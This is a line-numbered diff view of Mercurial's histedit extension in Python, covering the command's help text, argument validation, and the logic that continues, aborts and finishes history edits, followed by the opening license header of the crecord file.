1805 1801 outgoing revisions. For example, if there are multiple branches
1806 1802 containing outgoing revisions.
1807 1803
1808 1804 Use "min(outgoing() and ::.)" or similar revset specification
1809 1805 instead of --outgoing to specify edit target revision exactly in
1810 1806 such ambiguous situation. See :hg:`help revsets` for detail about
1811 1807 selecting revisions.
1812 1808
1813 1809 .. container:: verbose
1814 1810
1815 1811 Examples:
1816 1812
1817 1813 - A number of changes have been made.
1818 1814 Revision 3 is no longer needed.
1819 1815
1820 1816 Start history editing from revision 3::
1821 1817
1822 1818 hg histedit -r 3
1823 1819
1824 1820 An editor opens, containing the list of revisions,
1825 1821 with specific actions specified::
1826 1822
1827 1823 pick 5339bf82f0ca 3 Zworgle the foobar
1828 1824 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1829 1825 pick 0a9639fcda9d 5 Morgify the cromulancy
1830 1826
1831 1827 Additional information about the possible actions
1832 1828 to take appears below the list of revisions.
1833 1829
1834 1830 To remove revision 3 from the history,
1835 1831 its action (at the beginning of the relevant line)
1836 1832 is changed to 'drop'::
1837 1833
1838 1834 drop 5339bf82f0ca 3 Zworgle the foobar
1839 1835 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1840 1836 pick 0a9639fcda9d 5 Morgify the cromulancy
1841 1837
1842 1838 - A number of changes have been made.
1843 1839 Revision 2 and 4 need to be swapped.
1844 1840
1845 1841 Start history editing from revision 2::
1846 1842
1847 1843 hg histedit -r 2
1848 1844
1849 1845 An editor opens, containing the list of revisions,
1850 1846 with specific actions specified::
1851 1847
1852 1848 pick 252a1af424ad 2 Blorb a morgwazzle
1853 1849 pick 5339bf82f0ca 3 Zworgle the foobar
1854 1850 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1855 1851
1856 1852 To swap revision 2 and 4, its lines are swapped
1857 1853 in the editor::
1858 1854
1859 1855 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1860 1856 pick 5339bf82f0ca 3 Zworgle the foobar
1861 1857 pick 252a1af424ad 2 Blorb a morgwazzle
1862 1858
1863 1859 Returns 0 on success, 1 if user intervention is required (not only
1864 1860 for intentional "edit" command, but also for resolving unexpected
1865 1861 conflicts).
1866 1862 """
1867 1863 opts = pycompat.byteskwargs(opts)
1868 1864
1869 1865 # kludge: _chistedit only works for starting an edit, not aborting
1870 1866 # or continuing, so fall back to regular _texthistedit for those
1871 1867 # operations.
1872 1868 if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:
1873 1869 return _chistedit(ui, repo, freeargs, opts)
1874 1870 return _texthistedit(ui, repo, freeargs, opts)
1875 1871
1876 1872
1877 1873 def _texthistedit(ui, repo, freeargs, opts):
1878 1874 state = histeditstate(repo)
1879 1875 with repo.wlock() as wlock, repo.lock() as lock:
1880 1876 state.wlock = wlock
1881 1877 state.lock = lock
1882 1878 _histedit(ui, repo, state, freeargs, opts)
1883 1879
1884 1880
1885 1881 goalcontinue = b'continue'
1886 1882 goalabort = b'abort'
1887 1883 goaleditplan = b'edit-plan'
1888 1884 goalnew = b'new'
1889 1885
1890 1886
1891 1887 def _getgoal(opts):
1892 1888 if opts.get(b'continue'):
1893 1889 return goalcontinue
1894 1890 if opts.get(b'abort'):
1895 1891 return goalabort
1896 1892 if opts.get(b'edit_plan'):
1897 1893 return goaleditplan
1898 1894 return goalnew
1899 1895
1900 1896
1901 1897 def _readfile(ui, path):
1902 1898 if path == b'-':
1903 1899 with ui.timeblockedsection(b'histedit'):
1904 1900 return ui.fin.read()
1905 1901 else:
1906 1902 with open(path, b'rb') as f:
1907 1903 return f.read()
1908 1904
1909 1905
1910 1906 def _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):
1911 1907 # TODO only abort if we try to histedit mq patches, not just
1912 1908 # blanket if mq patches are applied somewhere
1913 1909 mq = getattr(repo, 'mq', None)
1914 1910 if mq and mq.applied:
1915 1911 raise error.Abort(_(b'source has mq patches applied'))
1916 1912
1917 1913 # basic argument incompatibility processing
1918 1914 outg = opts.get(b'outgoing')
1919 1915 editplan = opts.get(b'edit_plan')
1920 1916 abort = opts.get(b'abort')
1921 1917 force = opts.get(b'force')
1922 1918 if force and not outg:
1923 1919 raise error.Abort(_(b'--force only allowed with --outgoing'))
1924 1920 if goal == b'continue':
1925 1921 if any((outg, abort, revs, freeargs, rules, editplan)):
1926 1922 raise error.Abort(_(b'no arguments allowed with --continue'))
1927 1923 elif goal == b'abort':
1928 1924 if any((outg, revs, freeargs, rules, editplan)):
1929 1925 raise error.Abort(_(b'no arguments allowed with --abort'))
1930 1926 elif goal == b'edit-plan':
1931 1927 if any((outg, revs, freeargs)):
1932 1928 raise error.Abort(
1933 1929 _(b'only --commands argument allowed with --edit-plan')
1934 1930 )
1935 1931 else:
1936 1932 if state.inprogress():
1937 1933 raise error.Abort(
1938 1934 _(
1939 1935 b'history edit already in progress, try '
1940 1936 b'--continue or --abort'
1941 1937 )
1942 1938 )
1943 1939 if outg:
1944 1940 if revs:
1945 1941 raise error.Abort(_(b'no revisions allowed with --outgoing'))
1946 1942 if len(freeargs) > 1:
1947 1943 raise error.Abort(
1948 1944 _(b'only one repo argument allowed with --outgoing')
1949 1945 )
1950 1946 else:
1951 1947 revs.extend(freeargs)
1952 1948 if len(revs) == 0:
1953 1949 defaultrev = destutil.desthistedit(ui, repo)
1954 1950 if defaultrev is not None:
1955 1951 revs.append(defaultrev)
1956 1952
1957 1953 if len(revs) != 1:
1958 1954 raise error.Abort(
1959 1955 _(b'histedit requires exactly one ancestor revision')
1960 1956 )
1961 1957
1962 1958
1963 1959 def _histedit(ui, repo, state, freeargs, opts):
1964 1960 fm = ui.formatter(b'histedit', opts)
1965 1961 fm.startitem()
1966 1962 goal = _getgoal(opts)
1967 1963 revs = opts.get(b'rev', [])
1968 1964 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
1969 1965 rules = opts.get(b'commands', b'')
1970 1966 state.keep = opts.get(b'keep', False)
1971 1967
1972 1968 _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)
1973 1969
1974 1970 hastags = False
1975 1971 if revs:
1976 1972 revs = scmutil.revrange(repo, revs)
1977 1973 ctxs = [repo[rev] for rev in revs]
1978 1974 for ctx in ctxs:
1979 1975 tags = [tag for tag in ctx.tags() if tag != b'tip']
1980 1976 if not hastags:
1981 1977 hastags = len(tags)
1982 1978 if hastags:
1983 1979 if ui.promptchoice(
1984 1980 _(
1985 1981 b'warning: tags associated with the given'
1986 1982 b' changeset will be lost after histedit.\n'
1987 1983 b'do you want to continue (yN)? $$ &Yes $$ &No'
1988 1984 ),
1989 1985 default=1,
1990 1986 ):
1991 1987 raise error.Abort(_(b'histedit cancelled\n'))
1992 1988 # rebuild state
1993 1989 if goal == goalcontinue:
1994 1990 state.read()
1995 1991 state = bootstrapcontinue(ui, state, opts)
1996 1992 elif goal == goaleditplan:
1997 1993 _edithisteditplan(ui, repo, state, rules)
1998 1994 return
1999 1995 elif goal == goalabort:
2000 1996 _aborthistedit(ui, repo, state, nobackup=nobackup)
2001 1997 return
2002 1998 else:
2003 1999 # goal == goalnew
2004 2000 _newhistedit(ui, repo, state, revs, freeargs, opts)
2005 2001
2006 2002 _continuehistedit(ui, repo, state)
2007 2003 _finishhistedit(ui, repo, state, fm)
2008 2004 fm.end()
2009 2005
2010 2006
2011 2007 def _continuehistedit(ui, repo, state):
2012 2008 """This function runs after either:
2013 2009 - bootstrapcontinue (if the goal is 'continue')
2014 2010 - _newhistedit (if the goal is 'new')
2015 2011 """
2016 2012 # preprocess rules so that we can hide inner folds from the user
2017 2013 # and only show one editor
2018 2014 actions = state.actions[:]
2019 2015 for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):
2020 2016 if action.verb == b'fold' and nextact and nextact.verb == b'fold':
2021 2017 state.actions[idx].__class__ = _multifold
2022 2018
2023 2019 # Force an initial state file write, so the user can run --abort/continue
2024 2020 # even if there's an exception before the first transaction serialize.
2025 2021 state.write()
2026 2022
2027 2023 tr = None
2028 2024 # Don't use singletransaction by default since it rolls the entire
2029 2025 # transaction back if an unexpected exception happens (like a
2030 2026 # pretxncommit hook throws, or the user aborts the commit msg editor).
2031 2027 if ui.configbool(b"histedit", b"singletransaction"):
2032 2028 # Don't use a 'with' for the transaction, since actions may close
2033 2029 # and reopen a transaction. For example, if the action executes an
2034 2030 # external process it may choose to commit the transaction first.
2035 2031 tr = repo.transaction(b'histedit')
2036 2032 progress = ui.makeprogress(
2037 2033 _(b"editing"), unit=_(b'changes'), total=len(state.actions)
2038 2034 )
2039 2035 with progress, util.acceptintervention(tr):
2040 2036 while state.actions:
2041 2037 state.write(tr=tr)
2042 2038 actobj = state.actions[0]
2043 2039 progress.increment(item=actobj.torule())
2044 2040 ui.debug(
2045 2041 b'histedit: processing %s %s\n' % (actobj.verb, actobj.torule())
2046 2042 )
2047 2043 parentctx, replacement_ = actobj.run()
2048 2044 state.parentctxnode = parentctx.node()
2049 2045 state.replacements.extend(replacement_)
2050 2046 state.actions.pop(0)
2051 2047
2052 2048 state.write()
2053 2049
2054 2050
2055 2051 def _finishhistedit(ui, repo, state, fm):
2056 2052 """This action runs when histedit is finishing its session"""
2057 2053 hg.updaterepo(repo, state.parentctxnode, overwrite=False)
2058 2054
2059 2055 mapping, tmpnodes, created, ntm = processreplacement(state)
2060 2056 if mapping:
2061 2057 for prec, succs in pycompat.iteritems(mapping):
2062 2058 if not succs:
2063 2059 ui.debug(b'histedit: %s is dropped\n' % node.short(prec))
2064 2060 else:
2065 2061 ui.debug(
2066 2062 b'histedit: %s is replaced by %s\n'
2067 2063 % (node.short(prec), node.short(succs[0]))
2068 2064 )
2069 2065 if len(succs) > 1:
2070 2066 m = b'histedit: %s'
2071 2067 for n in succs[1:]:
2072 2068 ui.debug(m % node.short(n))
2073 2069
2074 2070 if not state.keep:
2075 2071 if mapping:
2076 2072 movetopmostbookmarks(repo, state.topmost, ntm)
2077 2073 # TODO update mq state
2078 2074 else:
2079 2075 mapping = {}
2080 2076
2081 2077 for n in tmpnodes:
2082 2078 if n in repo:
2083 2079 mapping[n] = ()
2084 2080
2085 2081 # remove entries about unknown nodes
2086 2082 has_node = repo.unfiltered().changelog.index.has_node
2087 2083 mapping = {
2088 2084 k: v
2089 2085 for k, v in mapping.items()
2090 2086 if has_node(k) and all(has_node(n) for n in v)
2091 2087 }
2092 2088 scmutil.cleanupnodes(repo, mapping, b'histedit')
2093 2089 hf = fm.hexfunc
2094 2090 fl = fm.formatlist
2095 2091 fd = fm.formatdict
2096 2092 nodechanges = fd(
2097 2093 {
2098 2094 hf(oldn): fl([hf(n) for n in newn], name=b'node')
2099 2095 for oldn, newn in pycompat.iteritems(mapping)
2100 2096 },
2101 2097 key=b"oldnode",
2102 2098 value=b"newnodes",
2103 2099 )
2104 2100 fm.data(nodechanges=nodechanges)
2105 2101
2106 2102 state.clear()
2107 2103 if os.path.exists(repo.sjoin(b'undo')):
2108 2104 os.unlink(repo.sjoin(b'undo'))
2109 2105 if repo.vfs.exists(b'histedit-last-edit.txt'):
2110 2106 repo.vfs.unlink(b'histedit-last-edit.txt')
2111 2107
2112 2108
2113 2109 def _aborthistedit(ui, repo, state, nobackup=False):
2114 2110 try:
2115 2111 state.read()
2116 2112 __, leafs, tmpnodes, __ = processreplacement(state)
2117 2113 ui.debug(b'restore wc to old parent %s\n' % node.short(state.topmost))
2118 2114
2119 2115 # Recover our old commits if necessary
2120 2116 if not state.topmost in repo and state.backupfile:
2121 2117 backupfile = repo.vfs.join(state.backupfile)
2122 2118 f = hg.openpath(ui, backupfile)
2123 2119 gen = exchange.readbundle(ui, f, backupfile)
2124 2120 with repo.transaction(b'histedit.abort') as tr:
2125 2121 bundle2.applybundle(
2126 2122 repo,
2127 2123 gen,
2128 2124 tr,
2129 2125 source=b'histedit',
2130 2126 url=b'bundle:' + backupfile,
2131 2127 )
2132 2128
2133 2129 os.remove(backupfile)
2134 2130
2135 2131 # check whether we should update away
2136 2132 if repo.unfiltered().revs(
2137 2133 b'parents() and (%n or %ln::)',
2138 2134 state.parentctxnode,
2139 2135 leafs | tmpnodes,
2140 2136 ):
2141 2137 hg.clean(repo, state.topmost, show_stats=True, quietempty=True)
2142 2138 cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)
2143 2139 cleanupnode(ui, repo, leafs, nobackup=nobackup)
2144 2140 except Exception:
2145 2141 if state.inprogress():
2146 2142 ui.warn(
2147 2143 _(
2148 2144 b'warning: encountered an exception during histedit '
2149 2145 b'--abort; the repository may not have been completely '
2150 2146 b'cleaned up\n'
2151 2147 )
2152 2148 )
2153 2149 raise
2154 2150 finally:
2155 2151 state.clear()
2156 2152
2157 2153
2158 2154 def hgaborthistedit(ui, repo):
2159 2155 state = histeditstate(repo)
2160 2156 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
2161 2157 with repo.wlock() as wlock, repo.lock() as lock:
2162 2158 state.wlock = wlock
2163 2159 state.lock = lock
2164 2160 _aborthistedit(ui, repo, state, nobackup=nobackup)
2165 2161
2166 2162
2167 2163 def _edithisteditplan(ui, repo, state, rules):
2168 2164 state.read()
2169 2165 if not rules:
2170 2166 comment = geteditcomment(
2171 2167 ui, node.short(state.parentctxnode), node.short(state.topmost)
2172 2168 )
2173 2169 rules = ruleeditor(repo, ui, state.actions, comment)
2174 2170 else:
2175 2171 rules = _readfile(ui, rules)
2176 2172 actions = parserules(rules, state)
2177 2173 ctxs = [repo[act.node] for act in state.actions if act.node]
2178 2174 warnverifyactions(ui, repo, actions, state, ctxs)
2179 2175 state.actions = actions
2180 2176 state.write()
2181 2177
2182 2178
2183 2179 def _newhistedit(ui, repo, state, revs, freeargs, opts):
2184 2180 outg = opts.get(b'outgoing')
2185 2181 rules = opts.get(b'commands', b'')
2186 2182 force = opts.get(b'force')
2187 2183
2188 2184 cmdutil.checkunfinished(repo)
2189 2185 cmdutil.bailifchanged(repo)
2190 2186
2191 2187 topmost = repo.dirstate.p1()
2192 2188 if outg:
2193 2189 if freeargs:
2194 2190 remote = freeargs[0]
2195 2191 else:
2196 2192 remote = None
2197 2193 root = findoutgoing(ui, repo, remote, force, opts)
2198 2194 else:
2199 2195 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
2200 2196 if len(rr) != 1:
2201 2197 raise error.Abort(
2202 2198 _(
2203 2199 b'The specified revisions must have '
2204 2200 b'exactly one common root'
2205 2201 )
2206 2202 )
2207 2203 root = rr[0].node()
2208 2204
2209 2205 revs = between(repo, root, topmost, state.keep)
2210 2206 if not revs:
2211 2207 raise error.Abort(
2212 2208 _(b'%s is not an ancestor of working directory') % node.short(root)
2213 2209 )
2214 2210
2215 2211 ctxs = [repo[r] for r in revs]
2216 2212
2217 2213 wctx = repo[None]
2218 2214 # Please don't ask me why `ancestors` is this value. I figured it
2219 2215 # out with print-debugging, not by actually understanding what the
2220 2216 # merge code is doing. :(
2221 2217 ancs = [repo[b'.']]
2222 2218 # Sniff-test to make sure we won't collide with untracked files in
2223 2219 # the working directory. If we don't do this, we can get a
2224 2220 # collision after we've started histedit and backing out gets ugly
2225 2221 # for everyone, especially the user.
2226 2222 for c in [ctxs[0].p1()] + ctxs:
2227 2223 try:
2228 2224 mergemod.calculateupdates(
2229 2225 repo,
2230 2226 wctx,
2231 2227 c,
2232 2228 ancs,
2233 2229 # These parameters were determined by print-debugging
2234 2230 # what happens later on inside histedit.
2235 2231 branchmerge=False,
2236 2232 force=False,
2237 2233 acceptremote=False,
2238 2234 followcopies=False,
2239 2235 )
2240 2236 except error.Abort:
2241 2237 raise error.Abort(
2242 2238 _(
2243 2239 b"untracked files in working directory conflict with files in %s"
2244 2240 )
2245 2241 % c
2246 2242 )
2247 2243
2248 2244 if not rules:
2249 2245 comment = geteditcomment(ui, node.short(root), node.short(topmost))
2250 2246 actions = [pick(state, r) for r in revs]
2251 2247 rules = ruleeditor(repo, ui, actions, comment)
2252 2248 else:
2253 2249 rules = _readfile(ui, rules)
2254 2250 actions = parserules(rules, state)
2255 2251 warnverifyactions(ui, repo, actions, state, ctxs)
2256 2252
2257 2253 parentctxnode = repo[root].p1().node()
2258 2254
2259 2255 state.parentctxnode = parentctxnode
2260 2256 state.actions = actions
2261 2257 state.topmost = topmost
2262 2258 state.replacements = []
2263 2259
2264 2260 ui.log(
2265 2261 b"histedit",
2266 2262 b"%d actions to histedit\n",
2267 2263 len(actions),
2268 2264 histedit_num_actions=len(actions),
2269 2265 )
2270 2266
2271 2267 # Create a backup so we can always abort completely.
2272 2268 backupfile = None
2273 2269 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2274 2270 backupfile = repair.backupbundle(
2275 2271 repo, [parentctxnode], [topmost], root, b'histedit'
2276 2272 )
2277 2273 state.backupfile = backupfile
2278 2274
2279 2275
2280 2276 def _getsummary(ctx):
2281 2277 # a common pattern is to extract the summary but default to the empty
2282 2278 # string
2283 2279 summary = ctx.description() or b''
2284 2280 if summary:
2285 2281 summary = summary.splitlines()[0]
2286 2282 return summary
2287 2283
2288 2284
2289 2285 def bootstrapcontinue(ui, state, opts):
2290 2286 repo = state.repo
2291 2287
2292 2288 ms = mergemod.mergestate.read(repo)
2293 2289 mergeutil.checkunresolved(ms)
2294 2290
2295 2291 if state.actions:
2296 2292 actobj = state.actions.pop(0)
2297 2293
2298 2294 if _isdirtywc(repo):
2299 2295 actobj.continuedirty()
2300 2296 if _isdirtywc(repo):
2301 2297 abortdirty()
2302 2298
2303 2299 parentctx, replacements = actobj.continueclean()
2304 2300
2305 2301 state.parentctxnode = parentctx.node()
2306 2302 state.replacements.extend(replacements)
2307 2303
2308 2304 return state
2309 2305
2310 2306
2311 2307 def between(repo, old, new, keep):
2312 2308 """select and validate the set of revision to edit
2313 2309
2314 2310 When keep is false, the specified set can't have children."""
2315 2311 revs = repo.revs(b'%n::%n', old, new)
2316 2312 if revs and not keep:
2317 2313 rewriteutil.precheck(repo, revs, b'edit')
2318 2314 if repo.revs(b'(%ld) and merge()', revs):
2319 2315 raise error.Abort(_(b'cannot edit history that contains merges'))
2320 2316 return pycompat.maplist(repo.changelog.node, revs)
2321 2317
2322 2318
2323 2319 def ruleeditor(repo, ui, actions, editcomment=b""):
2324 2320 """open an editor to edit rules
2325 2321
2326 2322 rules are in the format [ [act, ctx], ...] like in state.rules
2327 2323 """
2328 2324 if repo.ui.configbool(b"experimental", b"histedit.autoverb"):
2329 2325 newact = util.sortdict()
2330 2326 for act in actions:
2331 2327 ctx = repo[act.node]
2332 2328 summary = _getsummary(ctx)
2333 2329 fword = summary.split(b' ', 1)[0].lower()
2334 2330 added = False
2335 2331
2336 2332 # if it doesn't end with the special character '!' just skip this
2337 2333 if fword.endswith(b'!'):
2338 2334 fword = fword[:-1]
2339 2335 if fword in primaryactions | secondaryactions | tertiaryactions:
2340 2336 act.verb = fword
2341 2337 # get the target summary
2342 2338 tsum = summary[len(fword) + 1 :].lstrip()
2343 2339 # safe but slow: reverse iterate over the actions so we
2344 2340 # don't clash on two commits having the same summary
2345 2341 for na, l in reversed(list(pycompat.iteritems(newact))):
2346 2342 actx = repo[na.node]
2347 2343 asum = _getsummary(actx)
2348 2344 if asum == tsum:
2349 2345 added = True
2350 2346 l.append(act)
2351 2347 break
2352 2348
2353 2349 if not added:
2354 2350 newact[act] = []
2355 2351
2356 2352 # copy over and flatten the new list
2357 2353 actions = []
2358 2354 for na, l in pycompat.iteritems(newact):
2359 2355 actions.append(na)
2360 2356 actions += l
2361 2357
2362 2358 rules = b'\n'.join([act.torule() for act in actions])
2363 2359 rules += b'\n\n'
2364 2360 rules += editcomment
2365 2361 rules = ui.edit(
2366 2362 rules,
2367 2363 ui.username(),
2368 2364 {b'prefix': b'histedit'},
2369 2365 repopath=repo.path,
2370 2366 action=b'histedit',
2371 2367 )
2372 2368
2373 2369 # Save edit rules in .hg/histedit-last-edit.txt in case
2374 2370 # the user needs to ask for help after something
2375 2371 # surprising happens.
2376 2372 with repo.vfs(b'histedit-last-edit.txt', b'wb') as f:
2377 2373 f.write(rules)
2378 2374
2379 2375 return rules
2380 2376
2381 2377
2382 2378 def parserules(rules, state):
2383 2379 """Read the histedit rules string and return list of action objects """
2384 2380 rules = [
2385 2381 l
2386 2382 for l in (r.strip() for r in rules.splitlines())
2387 2383 if l and not l.startswith(b'#')
2388 2384 ]
2389 2385 actions = []
2390 2386 for r in rules:
2391 2387 if b' ' not in r:
2392 2388 raise error.ParseError(_(b'malformed line "%s"') % r)
2393 2389 verb, rest = r.split(b' ', 1)
2394 2390
2395 2391 if verb not in actiontable:
2396 2392 raise error.ParseError(_(b'unknown action "%s"') % verb)
2397 2393
2398 2394 action = actiontable[verb].fromrule(state, rest)
2399 2395 actions.append(action)
2400 2396 return actions
2401 2397
2402 2398
2403 2399 def warnverifyactions(ui, repo, actions, state, ctxs):
2404 2400 try:
2405 2401 verifyactions(actions, state, ctxs)
2406 2402 except error.ParseError:
2407 2403 if repo.vfs.exists(b'histedit-last-edit.txt'):
2408 2404 ui.warn(
2409 2405 _(
2410 2406 b'warning: histedit rules saved '
2411 2407 b'to: .hg/histedit-last-edit.txt\n'
2412 2408 )
2413 2409 )
2414 2410 raise
2415 2411
2416 2412
2417 2413 def verifyactions(actions, state, ctxs):
2418 2414 """Verify that there exists exactly one action per given changeset and
2419 2415 other constraints.
2420 2416
2421 2417 Will abort if there are to many or too few rules, a malformed rule,
2422 2418 or a rule on a changeset outside of the user-given range.
2423 2419 """
2424 2420 expected = {c.node() for c in ctxs}
2425 2421 seen = set()
2426 2422 prev = None
2427 2423
2428 2424 if actions and actions[0].verb in [b'roll', b'fold']:
2429 2425 raise error.ParseError(
2430 2426 _(b'first changeset cannot use verb "%s"') % actions[0].verb
2431 2427 )
2432 2428
2433 2429 for action in actions:
2434 2430 action.verify(prev, expected, seen)
2435 2431 prev = action
2436 2432 if action.node is not None:
2437 2433 seen.add(action.node)
2438 2434 missing = sorted(expected - seen) # sort to stabilize output
2439 2435
2440 2436 if state.repo.ui.configbool(b'histedit', b'dropmissing'):
2441 2437 if len(actions) == 0:
2442 2438 raise error.ParseError(
2443 2439 _(b'no rules provided'),
2444 2440 hint=_(b'use strip extension to remove commits'),
2445 2441 )
2446 2442
2447 2443 drops = [drop(state, n) for n in missing]
2448 2444 # put the in the beginning so they execute immediately and
2449 2445 # don't show in the edit-plan in the future
2450 2446 actions[:0] = drops
2451 2447 elif missing:
2452 2448 raise error.ParseError(
2453 2449 _(b'missing rules for changeset %s') % node.short(missing[0]),
2454 2450 hint=_(
2455 2451 b'use "drop %s" to discard, see also: '
2456 2452 b"'hg help -e histedit.config'"
2457 2453 )
2458 2454 % node.short(missing[0]),
2459 2455 )
2460 2456
2461 2457
2462 2458 def adjustreplacementsfrommarkers(repo, oldreplacements):
2463 2459 """Adjust replacements from obsolescence markers
2464 2460
2465 2461 Replacements structure is originally generated based on
2466 2462 histedit's state and does not account for changes that are
2467 2463 not recorded there. This function fixes that by adding
2468 2464 data read from obsolescence markers"""
2469 2465 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2470 2466 return oldreplacements
2471 2467
2472 2468 unfi = repo.unfiltered()
2473 2469 get_rev = unfi.changelog.index.get_rev
2474 2470 obsstore = repo.obsstore
2475 2471 newreplacements = list(oldreplacements)
2476 2472 oldsuccs = [r[1] for r in oldreplacements]
2477 2473 # successors that have already been added to succstocheck once
2478 2474 seensuccs = set().union(
2479 2475 *oldsuccs
2480 2476 ) # create a set from an iterable of tuples
2481 2477 succstocheck = list(seensuccs)
2482 2478 while succstocheck:
2483 2479 n = succstocheck.pop()
2484 2480 missing = get_rev(n) is None
2485 2481 markers = obsstore.successors.get(n, ())
2486 2482 if missing and not markers:
2487 2483 # dead end, mark it as such
2488 2484 newreplacements.append((n, ()))
2489 2485 for marker in markers:
2490 2486 nsuccs = marker[1]
2491 2487 newreplacements.append((n, nsuccs))
2492 2488 for nsucc in nsuccs:
2493 2489 if nsucc not in seensuccs:
2494 2490 seensuccs.add(nsucc)
2495 2491 succstocheck.append(nsucc)
2496 2492
2497 2493 return newreplacements
2498 2494
2499 2495
2500 2496 def processreplacement(state):
2501 2497 """process the list of replacements to return
2502 2498
2503 2499 1) the final mapping between original and created nodes
2504 2500 2) the list of temporary node created by histedit
2505 2501 3) the list of new commit created by histedit"""
2506 2502 replacements = adjustreplacementsfrommarkers(state.repo, state.replacements)
2507 2503 allsuccs = set()
2508 2504 replaced = set()
2509 2505 fullmapping = {}
2510 2506 # initialize basic set
2511 2507 # fullmapping records all operations recorded in replacement
2512 2508 for rep in replacements:
2513 2509 allsuccs.update(rep[1])
2514 2510 replaced.add(rep[0])
2515 2511 fullmapping.setdefault(rep[0], set()).update(rep[1])
2516 2512 new = allsuccs - replaced
2517 2513 tmpnodes = allsuccs & replaced
2518 2514 # Reduce content fullmapping into direct relation between original nodes
2519 2515 # and final node created during history edition
2520 2516 # Dropped changeset are replaced by an empty list
2521 2517 toproceed = set(fullmapping)
2522 2518 final = {}
2523 2519 while toproceed:
2524 2520 for x in list(toproceed):
2525 2521 succs = fullmapping[x]
2526 2522 for s in list(succs):
2527 2523 if s in toproceed:
2528 2524 # non final node with unknown closure
2529 2525 # We can't process this now
2530 2526 break
2531 2527 elif s in final:
2532 2528 # non final node, replace with closure
2533 2529 succs.remove(s)
2534 2530 succs.update(final[s])
2535 2531 else:
2536 2532 final[x] = succs
2537 2533 toproceed.remove(x)
2538 2534 # remove tmpnodes from final mapping
2539 2535 for n in tmpnodes:
2540 2536 del final[n]
2541 2537 # we expect all changes involved in final to exist in the repo
2542 2538 # turn `final` into list (topologically sorted)
2543 2539 get_rev = state.repo.changelog.index.get_rev
2544 2540 for prec, succs in final.items():
2545 2541 final[prec] = sorted(succs, key=get_rev)
2546 2542
2547 2543 # computed topmost element (necessary for bookmark)
2548 2544 if new:
2549 2545 newtopmost = sorted(new, key=state.repo.changelog.rev)[-1]
2550 2546 elif not final:
2551 2547 # Nothing rewritten at all. we won't need `newtopmost`
2552 2548 # It is the same as `oldtopmost` and `processreplacement` know it
2553 2549 newtopmost = None
2554 2550 else:
2555 2551 # every body died. The newtopmost is the parent of the root.
2556 2552 r = state.repo.changelog.rev
2557 2553 newtopmost = state.repo[sorted(final, key=r)[0]].p1().node()
2558 2554
2559 2555 return final, tmpnodes, new, newtopmost
2560 2556
2561 2557
2562 2558 def movetopmostbookmarks(repo, oldtopmost, newtopmost):
2563 2559 """Move bookmark from oldtopmost to newly created topmost
2564 2560
2565 2561 This is arguably a feature and we may only want that for the active
2566 2562 bookmark. But the behavior is kept compatible with the old version for now.
2567 2563 """
2568 2564 if not oldtopmost or not newtopmost:
2569 2565 return
2570 2566 oldbmarks = repo.nodebookmarks(oldtopmost)
2571 2567 if oldbmarks:
2572 2568 with repo.lock(), repo.transaction(b'histedit') as tr:
2573 2569 marks = repo._bookmarks
2574 2570 changes = []
2575 2571 for name in oldbmarks:
2576 2572 changes.append((name, newtopmost))
2577 2573 marks.applychanges(repo, tr, changes)
2578 2574
2579 2575
2580 2576 def cleanupnode(ui, repo, nodes, nobackup=False):
2581 2577 """strip a group of nodes from the repository
2582 2578
2583 2579 The set of node to strip may contains unknown nodes."""
2584 2580 with repo.lock():
2585 2581 # do not let filtering get in the way of the cleanse
2586 2582 # we should probably get rid of obsolescence marker created during the
2587 2583 # histedit, but we currently do not have such information.
2588 2584 repo = repo.unfiltered()
2589 2585 # Find all nodes that need to be stripped
2590 2586 # (we use %lr instead of %ln to silently ignore unknown items)
2591 2587 has_node = repo.changelog.index.has_node
2592 2588 nodes = sorted(n for n in nodes if has_node(n))
2593 2589 roots = [c.node() for c in repo.set(b"roots(%ln)", nodes)]
2594 2590 if roots:
2595 2591 backup = not nobackup
2596 2592 repair.strip(ui, repo, roots, backup=backup)
2597 2593
2598 2594
2599 2595 def stripwrapper(orig, ui, repo, nodelist, *args, **kwargs):
2600 2596 if isinstance(nodelist, bytes):
2601 2597 nodelist = [nodelist]
2602 2598 state = histeditstate(repo)
2603 2599 if state.inprogress():
2604 2600 state.read()
2605 2601 histedit_nodes = {
2606 2602 action.node for action in state.actions if action.node
2607 2603 }
2608 2604 common_nodes = histedit_nodes & set(nodelist)
2609 2605 if common_nodes:
2610 2606 raise error.Abort(
2611 2607 _(b"histedit in progress, can't strip %s")
2612 2608 % b', '.join(node.short(x) for x in common_nodes)
2613 2609 )
2614 2610 return orig(ui, repo, nodelist, *args, **kwargs)
2615 2611
2616 2612
2617 2613 extensions.wrapfunction(repair, b'strip', stripwrapper)
2618 2614
2619 2615
2620 2616 def summaryhook(ui, repo):
2621 2617 state = histeditstate(repo)
2622 2618 if not state.inprogress():
2623 2619 return
2624 2620 state.read()
2625 2621 if state.actions:
2626 2622 # i18n: column positioning for "hg summary"
2627 2623 ui.write(
2628 2624 _(b'hist: %s (histedit --continue)\n')
2629 2625 % (
2630 2626 ui.label(_(b'%d remaining'), b'histedit.remaining')
2631 2627 % len(state.actions)
2632 2628 )
2633 2629 )
2634 2630
2635 2631
2636 2632 def extsetup(ui):
2637 2633 cmdutil.summaryhooks.add(b'histedit', summaryhook)
2638 2634 statemod.addunfinished(
2639 2635 b'histedit',
2640 2636 fname=b'histedit-state',
2641 2637 allowcommit=True,
2642 2638 continueflag=True,
2643 2639 abortfunc=hgaborthistedit,
2644 2640 )
@@ -1,2037 +1,2034 b''
1 1 # stuff related specifically to patch manipulation / parsing
2 2 #
3 3 # Copyright 2008 Mark Edgington <edgimar@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7 #
8 8 # This code is based on the Mark Edgington's crecord extension.
9 9 # (Itself based on Bryan O'Sullivan's record extension.)
10 10
